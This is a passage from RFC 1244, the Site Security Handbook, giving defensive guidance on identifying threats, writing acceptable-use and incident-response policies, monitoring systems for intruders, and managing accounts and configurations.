drives, communication lines, terminal servers, routers.

2. Software: source programs, object programs,
utilities, diagnostic programs, operating systems,
communication programs.

3. Data: during execution, stored on-line, archived off-line,
backups, audit logs, databases, in transit over
communication media.

4. People: users, people needed to run systems.

5. Documentation: on programs, hardware, systems, local
administrative procedures.

6. Supplies: paper, forms, ribbons, magnetic media.

Site Security Policy Handbook Working Group [Page 11]

RFC 1244 Site Security Handbook July 1991

2.2.3 Identifying the Threats

Once the assets requiring protection are identified, it is
necessary to identify threats to those assests. The threats can
then be examined to determine what potential for loss exists. It
helps to consider from what threats you are trying to protect your
assets.

The following sections describe a few of the possible threats.

2.2.3.1 Unauthorized Access

A common threat that concerns many sites is unauthorized access
to computing facilities. Unauthorized access takes many forms.
One means of unauthorized access is the use of another user’s
account to gain access to a system. The use of any computer
resource without prior permission may be considered
unauthorized access to computing facilities.

The seriousness of an unauthorized access will vary from site
to site. For some sites, the mere act of granting access to an
unauthorized user may cause irreparable harm by negative media
coverage. For other sites, an unauthorized access opens the
door to other security threats. In addition, some sites may be
more frequent targets than others; hence the risk from
unauthorized access will vary from site to site. The Computer
Emergency Response Team (CERT – see section 3.9.7.3.1) has
observed that well-known universities, government sites, and
military sites seem to attract more intruders.

2.2.3.2 Disclosure of Information

Another common threat is disclosure of information. Determine
the value or sensitivity of the information stored on your
computers. Disclosure of a password file might allow for
future unauthorized accesses. A glimpse of a proposal may give
a competitor an unfair advantage. A technical paper may
contain years of valuable research.

2.2.3.3 Denial of Service

Computers and networks provide valuable services to their
users. Many people rely on these services in order to perform
their jobs efficiently. When these services are not available
when called upon, a loss in productivity results.

Denial of service comes in many forms and might affect users in
a number of ways. A network may be rendered unusable by a

Site Security Policy Handbook Working Group [Page 12]

RFC 1244 Site Security Handbook July 1991

rogue packet, jamming, or by a disabled network component. A
virus might slow down or cripple a computer system. Each site
should determine which services are essential, and for each of
these services determine the affect to the site if that service
were to become disabled.

2.3 Policy Issues

There are a number of issues that must be addressed when developing a
security policy. These are:

1. Who is allowed to use the resources?
2. What is the proper use of the resources?
3. Who is authorized to grant access and approve usage?
4. Who may have system administration privileges?
5. What are the user’s rights and responsibilities?
6. What are the rights and responsibilities of the
system administrator vs. those of the user?
7. What do you do with sensitive information?

These issues will be discussed below. In addition you may wish to
include a section in your policy concerning ethical use of computing
resources. Parker, Swope and Baker [17, PARKER90] and Forester and
Morrison [18, FORESTER] are two useful references that address
ethical issues.

2.3.1 Who is Allowed to use the Resources?

One step you must take in developing your security policy is
defining who is allowed to use your system and services. The
policy should explicitly state who is authorized to use what
resources.

2.3.2 What is the Proper Use of the Resources?

After determining who is allowed access to system resources it is
necessary to provide guidelines for the acceptable use of the
resources. You may have different guidelines for different types
of users (i.e., students, faculty, external users). The policy
should state what is acceptable use as well as unacceptable use.
It should also include types of use that may be restricted.

Define limits to access and authority. You will need to consider
the level of access various users will have and what resources
will be available or restricted to various groups of people.

Your acceptable use policy should clearly state that individual
users are responsible for their actions. Their responsibility

Site Security Policy Handbook Working Group [Page 13]

RFC 1244 Site Security Handbook July 1991

exists regardless of the security mechanisms that are in place.
It should be clearly stated that breaking into accounts or
bypassing security is not permitted.

The following points should be covered when developing an
acceptable use policy:

o Is breaking into accounts permitted?
o Is cracking passwords permitted?
o Is disrupting service permitted?
o Should users assume that a file being world-readable
grants them the authorization to read it?
o Should users be permitted to modify files that are
not their own even if they happen to have write
permission?
o Should users share accounts?

The answer to most of these questions will be “no”.

You may wish to incorporate a statement in your policies
concerning copyrighted and licensed software. Licensing
agreements with vendors may require some sort of effort on your
part to ensure that the license is not violated. In addition, you
may wish to inform users that the copying of copyrighted software
may be a violation of the copyright laws, and is not permitted.

Specifically concerning copyrighted and/or licensed software, you
may wish to include the following information:

o Copyrighted and licensed software may not be duplicated
unless it is explicitly stated that you may do so.
o Methods of conveying information on the
copyright/licensed status of software.
o When in doubt, DON’T COPY.

Your acceptable use policy is very important. A policy which does
not clearly state what is not permitted may leave you unable to
prove that a user violated policy.

There are exception cases like tiger teams and users or
administrators wishing for “licenses to hack” — you may face the
situation where users will want to “hack” on your services for
security research purposes. You should develop a policy that will
determine whether you will permit this type of research on your
services and if so, what your guidelines for such research will
be.

Points you may wish to cover in this area:

Site Security Policy Handbook Working Group [Page 14]

RFC 1244 Site Security Handbook July 1991

o Whether it is permitted at all.
o What type of activity is permitted: breaking in, releasing
worms, releasing viruses, etc..
o What type of controls must be in place to ensure that it
does not get out of control (e.g., separate a segment of
your network for these tests).
o How you will protect other users from being victims of
these activities, including external users and networks.
o The process for obtaining permission to conduct these
tests.

In cases where you do permit these activities, you should isolate
the portions of the network that are being tested from your main
network. Worms and viruses should never be released on a live
network.

You may also wish to employ, contract, or otherwise solicit one or
more people or organizations to evaluate the security of your
services, of which may include “hacking”. You may wish to provide
for this in your policy.

2.3.3 Who Is Authorized to Grant Access and Approve Usage?

Your policy should state who is authorized to grant access to your
services. Further, it must be determined what type of access they
are permitted to give. If you do not have control over who is
granted access to your system, you will not have control over who
is using your system. Controlling who has the authorization to
grant access will also enable you to know who was or was not
granting access if problems develop later.

There are many schemes that can be developed to control the
distribution of access to your services. The following are the
factors that you must consider when determining who will
distribute access to your services:

o Will you be distributing access from a centralized
point or at various points?

You can have a centralized distribution point to a distributed
system where various sites or departments independently authorize
access. The trade off is between security and convenience. The
more centralized, the easier to secure.

o What methods will you use for creating accounts and
terminating access?

From a security standpoint, you need to examine the mechanism that

Site Security Policy Handbook Working Group [Page 15]

RFC 1244 Site Security Handbook July 1991

you will be using to create accounts. In the least restrictive
case, the people who are authorized to grant access would be able
to go into the system directly and create an account by hand or
through vendor supplied mechanisms. Generally, these mechanisms
place a great deal of trust in the person running them, and the
person running them usually has a large amount of privileges. If
this is the choice you make, you need to select someone who is
trustworthy to perform this task. The opposite solution is to
have an integrated system that the people authorized to create
accounts run, or the users themselves may actually run. Be aware
that even in the restrictive case of having a mechanized facility
to create accounts does not remove the potential for abuse.

You should have specific procedures developed for the creation of
accounts. These procedures should be well documented to prevent
confusion and reduce mistakes. A security vulnerability in the
account authorization process is not only possible through abuse,
but is also possible if a mistake is made. Having clear and well
documented procedure will help ensure that these mistakes won’t
happen. You should also be sure that the people who will be
following these procedures understand them.

The granting of access to users is one of the most vulnerable of
times. You should ensure that the selection of an initial
password cannot be easily guessed. You should avoid using an
initial password that is a function of the username, is part of
the user’s name, or some algorithmically generated password that
can easily be guessed. In addition, you should not permit users
to continue to use the initial password indefinitely. If
possible, you should force users to change the initial password
the first time they login. Consider that some users may never
even login, leaving their password vulnerable indefinitely. Some
sites choose to disable accounts that have never been accessed,
and force the owner to reauthorize opening the account.

2.3.4 Who May Have System Administration Privileges?

One security decision that needs to be made very carefully is who
will have access to system administrator privileges and passwords
for your services. Obviously, the system administrators will need
access, but inevitably other users will request special
privileges. The policy should address this issue. Restricting
privileges is one way to deal with threats from local users. The
challenge is to balance restricting access to these to protect
security with giving people who need these privileges access so
that they can perform their tasks. One approach that can be taken
is to grant only enough privilege to accomplish the necessary
tasks.

Site Security Policy Handbook Working Group [Page 16]

RFC 1244 Site Security Handbook July 1991

Additionally, people holding special privileges should be
accountable to some authority and this should also be identified
within the site’s security policy. If the people you grant
privileges to are not accountable, you run the risk of losing
control of your system and will have difficulty managing a
compromise in security.

2.3.5 What Are The Users’ Rights and Responsibilities?

The policy should incorporate a statement on the users’ rights and
responsibilities concerning the use of the site’s computer systems
and services. It should be clearly stated that users are
responsible for understanding and respecting the security rules of
the systems they are using. The following is a list of topics
that you may wish to cover in this area of the policy:

o What guidelines you have regarding resource consumption
(whether users are restricted, and if so, what the
restrictions are).
o What might constitute abuse in terms of system performance.
o Whether users are permitted to share accounts or let others
use their accounts.
o How “secret” users should keep their passwords.
o How often users should change their passwords and any other
password restrictions or requirements.
o Whether you provide backups or expect the users to create
their own.
o Disclosure of information that may be proprietary.
o Statement on Electronic Mail Privacy (Electronic
Communications Privacy Act).
o Your policy concerning controversial mail or postings to
mailing lists or discussion groups (obscenity, harassment,
etc.).
o Policy on electronic communications: mail forging, etc.

The Electronic Mail Association sponsored a white paper on the
privacy of electronic mail in companies [4]. Their basic
recommendation is that every site should have a policy on the
protection of employee privacy. They also recommend that
organizations establish privacy policies that deal with all media,
rather than singling out electronic mail.

They suggest five criteria for evaluating any policy:

1. Does the policy comply with law and with duties to
third parties?

2. Does the policy unnecessarily compromise the interest of

Site Security Policy Handbook Working Group [Page 17]

RFC 1244 Site Security Handbook July 1991

the employee, the employer or third parties?

3. Is the policy workable as a practical matter and likely to
be enforced?

4. Does the policy deal appropriately with all different
forms of communications and record keeping with the office?

5. Has the policy been announced in advance and agreed to by
all concerned?

2.3.6 What Are The Rights and Responsibilities of System
Administrators Versus Rights of Users

There is a tradeoff between a user’s right to absolute privacy and
the need of system administrators to gather sufficient information
to diagnose problems. There is also a distinction between a
system administrator’s need to gather information to diagnose
problems and investigating security violations. The policy should
specify to what degree system administrators can examine user
files to diagnose problems or for other purposes, and what rights
you grant to the users. You may also wish to make a statement
concerning system administrators’ obligation to maintaining the
privacy of information viewed under these circumstances. A few
questions that should be answered are:

o Can an administrator monitor or read a user’s files
for any reason?
o What are the liabilities?
o Do network administrators have the right to examine
network or host traffic?

2.3.7 What To Do With Sensitive Information

Before granting users access to your services, you need to
determine at what level you will provide for the security of data
on your systems. By determining this, you are determining the
level of sensitivity of data that users should store on your
systems. You do not want users to store very sensitive
information on a system that you are not going to secure very
well. You need to tell users who might store sensitive
information what services, if any, are appropriate for the storage
of sensitive information. This part should include storing of
data in different ways (disk, magnetic tape, file servers, etc.).
Your policy in this area needs to be coordinated with the policy
concerning the rights of system administrators versus users (see
section 2.3.6).

Site Security Policy Handbook Working Group [Page 18]

RFC 1244 Site Security Handbook July 1991

2.4 What Happens When the Policy is Violated

It is obvious that when any type of official policy is defined, be it
related to computer security or not, it will eventually be broken.
The violation may occur due to an individual’s negligence, accidental
mistake, having not been properly informed of the current policy, or
not understanding the current policy. It is equally possible that an
individual (or group of individuals) may knowingly perform an act
that is in direct violation of the defined policy.

When a policy violation has been detected, the immediate course of
action should be pre-defined to ensure prompt and proper enforcement.
An investigation should be performed to determine how and why the
violation occurred. Then the appropriate corrective action should be
executed. The type and severity of action taken varies depending on
the type of violation that occurred.

2.4.1 Determining the Response to Policy Violations

Violations to policy may be committed by a wide variety of users.
Some may be local users and others may be from outside the local
environment. Sites may find it helpful to define what it
considers “insiders” and “outsiders” based upon administrative,
legal or political boundaries. These boundaries imply what type
of action must be taken to correct the offending party; from a
written reprimand to pressing legal charges. So, not only do you
need to define actions based on the type of violation, you also
need to have a clearly defined series of actions based on the kind
of user violating your computer security policy. This all seems
rather complicated, but should be addressed long before it becomes
necessary as the result of a violation.

One point to remember about your policy is that proper education
is your best defense. For the outsiders who are using your
computer legally, it is your responsibility to verify that these
individuals are aware of the policies that you have set forth.
Having this proof may assist you in the future if legal action
becomes necessary.

As for users who are using your computer illegally, the problem is
basically the same. What type of user violated the policy and how
and why did they do it? Depending on the results of your
investigation, you may just prefer to “plug” the hole in your
computer security and chalk it up to experience. Or if a
significant amount of loss was incurred, you may wish to take more
drastic action.

Site Security Policy Handbook Working Group [Page 19]

RFC 1244 Site Security Handbook July 1991

2.4.2 What to do When Local Users Violate the Policy of a Remote
Site

In the event that a local user violates the security policy of a
remote site, the local site should have a clearly defined set of
administrative actions to take concerning that local user. The
site should also be prepared to protect itself against possible
actions by the remote site. These situations involve legal issues
which should be addressed when forming the security policy.

2.4.3 Defining Contacts and Responsibilities to Outside
Organizations

The local security policy should include procedures for
interaction with outside organizations. These include law
enforcement agencies, other sites, external response team
organizations (e.g., the CERT, CIAC) and various press agencies.
The procedure should state who is authorized to make such contact
and how it should be handled. Some questions to be answered
include:

o Who may talk to the press?
o When do you contact law enforcement and investigative agencies?
o If a connection is made from a remote site, is the
system manager authorized to contact that site?
o Can data be released? What kind?

Detailed contact information should be readily available along
with clearly defined procedures to follow.

2.4.4 What are the Responsibilities to our Neighbors and Other
Internet Sites?

The Security Policy Working Group within the IETF is working on a
document entitled, “Policy Guidelines for the Secure Operation of
the Internet” [23]. It addresses the issue that the Internet is a
cooperative venture and that sites are expected to provide mutual
security assistance. This should be addressed when developing a
site’s policy. The major issue to be determined is how much
information should be released. This will vary from site to site
according to the type of site (e.g., military, education,
commercial) as well as the type of security violation that
occurred.

2.4.5 Issues for Incident Handling Procedures

Along with statements of policy, the document being prepared
should include procedures for incident handling. This is covered

Site Security Policy Handbook Working Group [Page 20]

RFC 1244 Site Security Handbook July 1991

in detail in the next chapter. There should be procedures
available that cover all facets of policy violation.

2.5 Locking In or Out

Whenever a site suffers an incident which may compromise computer
security, the strategies for reacting may be influenced by two
opposing pressures.

If management fears that the site is sufficiently vulnerable, it may
choose a “Protect and Proceed” strategy. This approach will have as
its primary goal the protection and preservation of the site
facilities and to provide for normalcy for its users as quickly as
possible. Attempts will be made to actively interfere with the
intruder’s processes, prevent further access and begin immediate
damage assessment and recovery. This process may involve shutting
down the facilities, closing off access to the network, or other
drastic measures. The drawback is that unless the intruder is
identified directly, they may come back into the site via a different
path, or may attack another site.

The alternate approach, “Pursue and Prosecute”, adopts the opposite
philosophy and goals. The primary goal is to allow intruders to
continue their activities at the site until the site can identify the
responsible persons. This approach is endorsed by law enforcement
agencies and prosecutors. The drawback is that the agencies cannot
exempt a site from possible user lawsuits if damage is done to their
systems and data.

Prosecution is not the only outcome possible if the intruder is
identified. If the culprit is an employee or a student, the
organization may choose to take disciplinary actions. The computer
security policy needs to spell out the choices and how they will be
selected if an intruder is caught.

Careful consideration must be made by site management regarding their
approach to this issue before the problem occurs. The strategy
adopted might depend upon each circumstance. Or there may be a
global policy which mandates one approach in all circumstances. The
pros and cons must be examined thoroughly and the users of the
facilities must be made aware of the policy so that they understand
their vulnerabilities no matter which approach is taken.

The following are checklists to help a site determine which strategy
to adopt: “Protect and Proceed” or “Pursue and Prosecute”.

Site Security Policy Handbook Working Group [Page 21]

RFC 1244 Site Security Handbook July 1991

Protect and Proceed

1. If assets are not well protected.

2. If continued penetration could result in great
financial risk.

3. If the possibility or willingness to prosecute
is not present.

4. If user base is unknown.

5. If users are unsophisticated and their work is
vulnerable.

6. If the site is vulnerable to lawsuits from users, e.g.,
if their resources are undermined.

Pursue and Prosecute

1. If assets and systems are well protected.

2. If good backups are available.

3. If the risk to the assets is outweighed by the
disruption caused by the present and possibly future
penetrations.

4. If this is a concentrated attack occurring with great
frequency and intensity.

5. If the site has a natural attraction to intruders, and
consequently regularly attracts intruders.

6. If the site is willing to incur the financial (or other)
risk to assets by allowing the penetrator continue.

7. If intruder access can be controlled.

8. If the monitoring tools are sufficiently well-developed
to make the pursuit worthwhile.

9. If the support staff is sufficiently clever and knowledgable
about the operating system, related utilities, and systems
to make the pursuit worthwhile.

10. If there is willingness on the part of management to
prosecute.

Site Security Policy Handbook Working Group [Page 22]

RFC 1244 Site Security Handbook July 1991

11. If the system adminitrators know in general what kind of
evidence would lead to prosecution.

12. If there is established contact with knowledgeable law
enforcement.

13. If there is a site representative versed in the relevant
legal issues.

14. If the site is prepared for possible legal action from
its own users if their data or systems become compromised
during the pursuit.

2.6 Interpreting the Policy

It is important to define who will interpret the policy. This could
be an individual or a committee. No matter how well written, the
policy will require interpretation from time to time and this body
would serve to review, interpret, and revise the policy as needed.

2.7 Publicizing the Policy

Once the site security policy has been written and established, a
vigorous process should be engaged to ensure that the policy
statement is widely and thoroughly disseminated and discussed. A
mailing of the policy should not be considered sufficient. A period
for comments should be allowed before the policy becomes effective to
ensure that all affected users have a chance to state their reactions
and discuss any unforeseen ramifications. Ideally, the policy should
strike a balance between protection and productivity.

Meetings should be held to elicit these comments, and also to ensure
that the policy is correctly understood. (Policy promulgators are
not necessarily noted for their skill with the language.) These
meetings should involve higher management as well as line employees.
Security is a collective effort.

In addition to the initial efforts to publicize the policy, it is
essential for the site to maintain a continual awareness of its
computer security policy. Current users may need periodic reminders
New users should have the policy included as part of their site
introduction packet. As a condition for using the site facilities,
it may be advisable to have them sign a statement that they have read
and understood the policy. Should any of these users require legal
action for serious policy violations, this signed statement might
prove to be a valuable aid.

Site Security Policy Handbook Working Group [Page 23]

RFC 1244 Site Security Handbook July 1991

3. Establishing Procedures to Prevent Security Problems

The security policy defines what needs to be protected. This section
discusses security procedures which specify what steps will be used
to carry out the security policy.

3.1 Security Policy Defines What Needs to be Protected

The security policy defines the WHAT’s: what needs to be protected,
what is most important, what the priorities are, and what the general
approach to dealing with security problems should be.

The security policy by itself doesn’t say HOW things are protected.
That is the role of security procedures, which this section
discusses. The security policy should be a high level document,
giving general strategy. The security procedures need to set out, in
detail, the precise steps your site will take to protect itself.

The security policy should include a general risk assessment of the
types of threats a site is mostly likely to face and the consequences
of those threats (see section 2.2). Part of doing a risk assessment
will include creating a general list of assets that should be
protected (section 2.2.2). This information is critical in devising
cost-effective procedures.

It is often tempting to start creating security procedures by
deciding on different mechanisms first: “our site should have logging
on all hosts, call-back modems, and smart cards for all users.” This
approach could lead to some areas that have too much protection for
the risk they face, and other areas that aren’t protected enough.
Starting with the security policy and the risks it outlines should
ensure that the procedures provide the right level of protect for all
assets.

3.2 Identifing Possible Problems

To determine risk, vulnerabilities must be identified. Part of the
purpose of the policy is to aid in shoring up the vulnerabilities and
thus to decrease the risk in as many areas as possible. Several of
the more popular problem areas are presented in sections below. This
list is by no means complete. In addition, each site is likely to
have a few unique vulnerabilities.

3.2.1 Access Points

Access points are typically used for entry by unauthorized users.
Having many access points increases the risk of access to an
organization’s computer and network facilities.

Site Security Policy Handbook Working Group [Page 24]

RFC 1244 Site Security Handbook July 1991

Network links to networks outside the organization allow access
into the organization for all others connected to that external
network. A network link typically provides access to a large
number of network services, and each service has a potential to be
compromised.

Dialup lines, depending on their configuration, may provide access
merely to a login port of a single system. If connected to a
terminal server, the dialup line may give access to the entire
network.

Terminal servers themselves can be a source of problem. Many
terminal servers do not require any kind of authentication.
Intruders often use terminal servers to disguise their actions,
dialing in on a local phone and then using the terminal server to
go out to the local network. Some terminal servers are configured
so that intruders can TELNET [19] in from outside the network, and
then TELNET back out again, again serving to make it difficult to
trace them.

3.2.2 Misconfigured Systems

Misconfigured systems form a large percentage of security holes.
Today’s operating systems and their associated software have
become so complex that understanding how the system works has
become a full-time job. Often, systems managers will be non-
specialists chosen from the current organization’s staff.

Vendors are also partly responsible for misconfigured systems. To
make the system installation process easier, vendors occasionally
choose initial configurations that are not secure in all
environments.

3.2.3 Software Bugs

Software will never be bug free. Publicly known security bugs are
common methods of unauthorized entry. Part of the solution to
this problem is to be aware of the security problems and to update
the software when problems are detected. When bugs are found,
they should be reported to the vendor so that a solution to the
problem can be implemented and distributed.

3.2.4 “Insider” Threats

An insider to the organization may be a considerable threat to the
security of the computer systems. Insiders often have direct
access to the computer and network hardware components. The
ability to access the components of a system makes most systems

Site Security Policy Handbook Working Group [Page 25]

RFC 1244 Site Security Handbook July 1991

easier to compromise. Most desktop workstations can be easily
manipulated so that they grant privileged access. Access to a
local area network provides the ability to view possibly sensitive
data traversing the network.

3.3 Choose Controls to Protect Assets in a Cost-Effective Way

After establishing what is to be protected, and assessing the risks
these assets face, it is necessary to decide how to implement the
controls which protect these assets. The controls and protection
mechanisms should be selected in a way so as to adequately counter
the threats found during risk assessment, and to implement those
controls in a cost effective manner. It makes little sense to spend
an exorbitant sum of money and overly constrict the user base if the
risk of exposure is very small.

3.3.1 Choose the Right Set of Controls

The controls that are selected represent the physical embodiment
of your security policy. They are the first and primary line of
defense in the protection of your assets. It is therefore most
important to ensure that the controls that you select are the
right set of controls. If the major threat to your system is
outside penetrators, it probably doesn’t make much sense to use
biometric devices to authenticate your regular system users. On
the other hand, if the major threat is unauthorized use of
computing resources by regular system users, you’ll probably want
to establish very rigorous automated accounting procedures.

3.3.2 Use Common Sense

Common sense is the most appropriate tool that can be used to
establish your security policy. Elaborate security schemes and
mechanisms are impressive, and they do have their place, yet there
is little point in investing money and time on an elaborate
implementation scheme if the simple controls are forgotten. For
example, no matter how elaborate a system you put into place on
top of existing security controls, a single user with a poor
password can still leave your system open to attack.

3.4 Use Multiple Strategies to Protect Assets

Another method of protecting assets is to use multiple strategies.
In this way, if one strategy fails or is circumvented, another
strategy comes into play to continue protecting the asset. By using
several simpler strategies, a system can often be made more secure
than if one very sophisticated method were used in its place. For
example, dial-back modems can be used in conjunction with traditional

Site Security Policy Handbook Working Group [Page 26]

RFC 1244 Site Security Handbook July 1991

logon mechanisms. Many similar approaches could be devised that
provide several levels of protection for assets. However, it’s very
easy to go overboard with extra mechanisms. One must keep in mind
exactly what it is that needs to be protected.

3.5 Physical Security

It is a given in computer security if the system itself is not
physically secure, nothing else about the system can be considered
secure. With physical access to a machine, an intruder can halt the
machine, bring it back up in privileged mode, replace or alter the
disk, plant Trojan horse programs (see section 2.13.9.2), or take any
number of other undesirable (and hard to prevent) actions.

Critical communications links, important servers, and other key
machines should be located in physically secure areas. Some security
systems (such as Kerberos) require that the machine be physically
secure.

If you cannot physically secure machines, care should be taken about
trusting those machines. Sites should consider limiting access from
non-secure machines to more secure machines. In particular, allowing
trusted access (e.g., the BSD Unix remote commands such as rsh) from
these kinds of hosts is particularly risky.

For machines that seem or are intended to be physically secure, care
should be taken about who has access to the machines. Remember that
custodial and maintenance staff often have keys to rooms.

3.6 Procedures to Recognize Unauthorized Activity

Several simple procedures can be used to detect most unauthorized
uses of a computer system. These procedures use tools provided with
the operating system by the vendor, or tools publicly available from
other sources.

3.6.1 Monitoring System Use

System monitoring can be done either by a system administrator, or
by software written for the purpose. Monitoring a system involves
looking at several parts of the system and searching for anything
unusual. Some of the easier ways to do this are described in this
section.

The most important thing about monitoring system use is that it be
done on a regular basis. Picking one day out of the month to
monitor the system is pointless, since a security breach can be
isolated to a matter of hours. Only by maintaining a constant

Site Security Policy Handbook Working Group [Page 27]

RFC 1244 Site Security Handbook July 1991

vigil can you expect to detect security violations in time to
react to them.

3.6.2 Tools for Monitoring the System

This section describes tools and methods for monitoring a system
against unauthorized access and use.

3.6.2.1 Logging

Most operating systems store numerous bits of information in
log files. Examination of these log files on a regular basis
is often the first line of defense in detecting unauthorized
use of the system.

– Compare lists of currently logged in users and past
login histories. Most users typically log in and out
at roughly the same time each day. An account logged
in outside the “normal” time for the account may be in
use by an intruder.

– Many systems maintain accounting records for billing
purposes. These records can also be used to determine
usage patterns for the system; unusual accounting records
may indicate unauthorized use of the system.

– System logging facilities, such as the UNIX “syslog”
utility, should be checked for unusual error messages
from system software. For example, a large number of
failed login attempts in a short period of time may
indicate someone trying to guess passwords.

– Operating system commands which list currently executing
processes can be used to detect users running programs
they are not authorized to use, as well as to detect
unauthorized programs which have been started by an
intruder.

3.6.2.2 Monitoring Software

Other monitoring tools can easily be constructed using standard
operating system software, by using several, often unrelated,
programs together. For example, checklists of file ownerships
and permission settings can be constructed (for example, with
“ls” and “find” on UNIX) and stored off-line. These lists can
then be reconstructed periodically and compared against the
master checklist (on UNIX, by using the “diff” utility).
Differences may indicate that unauthorized modifications have

Site Security Policy Handbook Working Group [Page 28]

RFC 1244 Site Security Handbook July 1991

been made to the system.

Still other tools are available from third-party vendors and
public software distribution sites. Section 3.9.9 lists
several sources from which you can learn what tools are
available and how to get them.

3.6.2.3 Other Tools

Other tools can also be used to monitor systems for security
violations, although this is not their primary purpose. For
example, network monitors can be used to detect and log
connections from unknown sites.

3.6.3 Vary the Monitoring Schedule

The task of system monitoring is not as daunting as it may seem.
System administrators can execute many of the commands used for
monitoring periodically throughout the day during idle moments
(e.g., while talking on the telephone), rather than spending fixed
periods of each day monitoring the system. By executing the
commands frequently, you will rapidly become used to seeing
“normal” output, and will easily spot things which are out of the
ordinary. In addition, by running various monitoring commands at
different times throughout the day, you make it hard for an
intruder to predict your actions. For example, if an intruder
knows that each day at 5:00 p.m. the system is checked to see that
everyone has logged off, he will simply wait until after the check
has completed before logging in. But the intruder cannot guess
when a system administrator might type a command to display all
logged-in users, and thus he runs a much greater risk of
detection.

Despite the advantages that regular system monitoring provides,
some intruders will be aware of the standard logging mechanisms in
use on systems they are attacking. They will actively pursue and
attempt to disable monitoring mechanisms. Regular monitoring
therefore is useful in detecting intruders, but does not provide
any guarantee that your system is secure, nor should monitoring be
considered an infallible method of detecting unauthorized use.

3.7 Define Actions to Take When Unauthorized Activity is Suspected

Sections 2.4 and 2.5 discussed the course of action a site should
take when it suspects its systems are being abused. The computer
security policy should state the general approach towards dealing
with these problems.

Site Security Policy Handbook Working Group [Page 29]

RFC 1244 Site Security Handbook July 1991

The procedures for dealing with these types of problems should be
written down. Who has authority to decide what actions will be
taken? Should law enforcement be involved? Should your
organization cooperate with other sites in trying to track down an
intruder? Answers to all the questions in section 2.4 should be
part of the incident handling procedures.

Whether you decide to lock out or pursue intruders, you should
have tools and procedures ready to apply. It is best to work up
these tools and procedures before you need them. Don’t wait until
an intruder is on your system to figure out how to track the
intruder’s actions; you will be busy enough if an intruder
strikes.

3.8 Communicating Security Policy

Security policies, in order to be effective, must be communicated to
both the users of the system and the system maintainers. This
section describes what these people should be told, and how to tell
them.

3.8.1 Educating the Users

Users should be made aware of how the computer systems are
expected to be used, and how to protect themselves from
unauthorized users.

3.8.1.1 Proper Account/Workstation Use

All users should be informed about what is considered the
“proper” use of their account or workstation (“proper” use is
discussed in section 2.3.2). This can most easily be done at
the time a user receives their account, by giving them a policy
statement. Proper use policies typically dictate things such
as whether or not the account or workstation may be used for
personal activities (such as checkbook balancing or letter
writing), whether profit-making activities are allowed, whether
game playing is permitted, and so on. These policy statements
may also be used to summarize how the computer facility is
licensed and what software licenses are held by the
institution; for example, many universities have educational
licenses which explicitly prohibit commercial uses of the
system. A more complete list of items to consider when writing
a policy statement is given in section 2.3.

3.8.1.2 Account/Workstation Management Procedures

Each user should be told how to properly manage their account

Site Security Policy Handbook Working Group [Page 30]

RFC 1244 Site Security Handbook July 1991

and workstation. This includes explaining how to protect files
stored on the system, how to log out or lock the terminal or
workstation, and so on. Much of this information is typically
covered in the “beginning user” documentation provided by the
operating system vendor, although many sites elect to
supplement this material with local information.

If your site offers dial-up modem access to the computer
systems, special care must be taken to inform users of the
security problems inherent in providing this access. Issues
such as making sure to log out before hanging up the modem
should be covered when the user is initially given dial-up
access.

Likewise, access to the systems via local and wide-area
networks presents its own set of security problems which users
should be made aware of. Files which grant “trusted host” or
“trusted user” status to remote systems and users should be
carefully explained.

3.8.1.3 Determining Account Misuse

Users should be told how to detect unauthorized access to their
account. If the system prints the last login time when a user
logs in, he or she should be told to check that time and note
whether or not it agrees with the last time he or she actually
logged in.

Command interpreters on some systems (e.g., the UNIX C shell)
maintain histories of the last several commands executed.
Users should check these histories to be sure someone has not
executed other commands with their account.

3.8.1.4 Problem Reporting Procedures

A procedure should be developed to enable users to report
suspected misuse of their accounts or other misuse they may
have noticed. This can be done either by providing the name
and telephone number of a system administrator who manages
security of the computer system, or by creating an electronic
mail address (e.g., “security”) to which users can address
their problems.

3.8.2 Educating the Host Administrators

In many organizations, computer systems are administered by a wide
variety of people. These administrators must know how to protect
their own systems from attack and unauthorized use, as well as how

Site Security Policy Handbook Working Group [Page 31]

RFC 1244 Site Security Handbook July 1991

to communicate successful penetration of their systems to other
administrators as a warning.

3.8.2.1 Account Management Procedures

Care must be taken when installing accounts on the system in
order to make them secure. When installing a system from
distribution media, the password file should be examined for
“standard” accounts provided by the vendor. Many vendors
provide accounts for use by system services or field service
personnel. These accounts typically have either no password or
one which is common knowledge. These accounts should be given
new passwords if they are needed, or disabled or deleted from
the system if they are not.

Accounts without passwords are generally very dangerous since
they allow anyone to access the system. Even accounts which do
not execute a command interpreter (e.g., accounts which exist
only to see who is logged in to the system) can be compromised
if set up incorrectly. A related concept, that of “anonymous”
file transfer (FTP) [20], allows users from all over the
network to access your system to retrieve files from (usually)
a protected disk area. You should carefully weigh the benefits
that an account without a password provides against the
security risks of providing such access to your system.

If the operating system provides a “shadow” password facility
which stores passwords in a separate file accessible only to
privileged users, this facility should be used. System V UNIX,
SunOS 4.0 and above, and versions of Berkeley UNIX after 4.3BSD
Tahoe, as well as others, provide this feature. It protects
passwords by hiding their encrypted values from unprivileged
users. This prevents an attacker from copying your password
file to his or her machine and then attempting to break the
passwords at his or her leisure.

Keep track of who has access to privileged user accounts (e.g.,
“root” on UNIX or “MAINT” on VMS). Whenever a privileged user
leaves the organization or no longer has need of the privileged
account, the passwords on all privileged accounts should be
changed.

3.8.2.2 Configuration Management Procedures

When installing a system from the distribution media or when
installing third-party software, it is important to check the
installation carefully. Many installation procedures assume a
“trusted” site, and hence will install files with world write

Site Security Policy Handbook Working Group [Page 32]

RFC 1244 Site Security Handbook July 1991

permission enabled, or otherwise compromise the security of
files.

Network services should also be examined carefully when first
installed. Many vendors provide default network permission
files which imply that all outside hosts are to be “trusted”,
which is rarely the case when connected to wide-area networks
such as the Internet.

Many intruders collect information on the vulnerabilities of
particular system versions. The older a system, the more
likely it is that there are security problems in that version
which have since been fixed by the vendor in a later release.
For this reason, it is important to weigh the risks of not
upgrading to a new operating system release (thus leaving
security holes unplugged) against the cost of upgrading to the
new software (possibly breaking third-party software, etc.).
Bug fixes from the vendor should be weighed in a similar
fashion, with the added note that “security” fixes from a
vendor usually address fairly serious security problems.

Other bug fixes, received via network mailing lists and the
like, should usually be installed, but not without careful
examination. Never install a bug fix unless you’re sure you
know what the consequences of the fix are – there’s always the
possibility that an intruder has suggested a “fix” which
actually gives him or her access to your system.

3.8.2.3 Recovery Procedures – Backups

It is impossible to overemphasize the need for a good backup
strategy. File system backups not only protect you in the
event of hardware failure or accidental deletions, but they
also protect you against unauthorized changes made by an
intruder. Without a copy of your data the way it’s “supposed”
